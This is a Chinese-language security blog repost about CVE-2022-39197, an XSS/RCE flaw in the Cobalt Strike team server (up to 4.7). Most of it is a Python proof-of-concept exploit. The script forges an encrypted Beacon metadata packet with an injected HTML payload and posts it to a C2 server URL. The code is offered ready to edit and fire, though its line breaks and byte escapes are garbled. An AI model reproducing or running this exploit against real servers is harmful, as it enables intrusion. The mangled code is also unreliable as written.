CVE-2022-39197 Cobalt Strike <= 4.7 RCE

渗透技巧 2年前 (2022) admin
637 0 0


        Cobalt Strike 到 4.7 中发现了一个 XSS(跨站点脚本)漏洞,允许远程攻击者在 Cobalt Strike 团队服务器上执行 HTML。要利用此漏洞,必须首先检查 Cobalt Strike 有效负载,然后修改有效负载中的用户名字段(或使用提取的信息创建一个新有效负载,然后将该用户名字段修改为格式错误)。

POC

#!/usr/bin/env python# coding=utf-8import hexdumpimport rsaimport randomimport base64import stringimport urllib.request
#pack = b'x00x00xBExEF' # pack head#pack += b'x00x00x00x4C' # pack lenpack = bytearray(random.getrandbits(4) for _ in range(16)) # AESKEYpack += b'xa8x03' # name charset (int) (little)pack += b'xa8x03' # name charset (int) (little)# pack+=b'x00x00x00x06' # Beacon Id randompack += random.randint(0 , 9999999) .to_bytes(4, 'big') # Beacon Idpack += random.randint(0 , 65535) .to_bytes(4, 'big') # Beacon Pidpack += b'x00x00' # Beacon Portpack += b'x04' # Beacon Flag 04pack += b'x06'pack += b'x02'pack += b'x23xf0x00x00x00x00' # windows version (int)pack += b'x76x91' # windows version_1 (int)pack += b'x0ax60x76x90xf5x50'pack += bytearray(random.getrandbits(4) for _ in range(4)) # Beacon Ippack += b'x4bx4b'+b'x09'+b'<html><img src=http://127.0.0.1/1.jpg>'+b'x09'+b'x61' # PAYLOAD LOAD A IMAGE *NEED-EDITpack = b'x00x00xBExEF'+len(pack).to_bytes(4, 'big')+packurl = 'http://192.168.234.100/pixel.gif' # C2 Server metadata post url (CobaltStrikeParser C2Server) *NEED-EDITpubkey = rsa.PublicKey.load_pkcs1_openssl_pem("""-----BEGIN PUBLIC KEY-----MIGfXXXXXXXXXXXXXXXX==-----END PUBLIC KEY-----""")# use the CobaltStrikeParser extract public key from the payload https://github.com/Sentinel-One/CobaltStrikeParser parse_beacon_config.py payload_url --json#Remember to remove the extra padding from the public key *NEED-EDITenpack = rsa.encrypt(pack, pubkey)header = {'Cookie': base64.b64encode(enpack).decode('utf-8')}request = urllib.request.Request(url, headers=header)reponse = urllib.request.urlopen(request).read()#print('base64:', base64.b64encode(enpack).decode('utf-8'))#print(hexdump.hexdump(pack))Footer




原文始发于微信公众号(Khan安全攻防实验室):CVE-2022-39197 Cobalt Strike <= 4.7 RCE

版权声明:admin 发表于 2022年9月27日 上午8:30。
转载请注明:CVE-2022-39197 Cobalt Strike <= 4.7 RCE | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...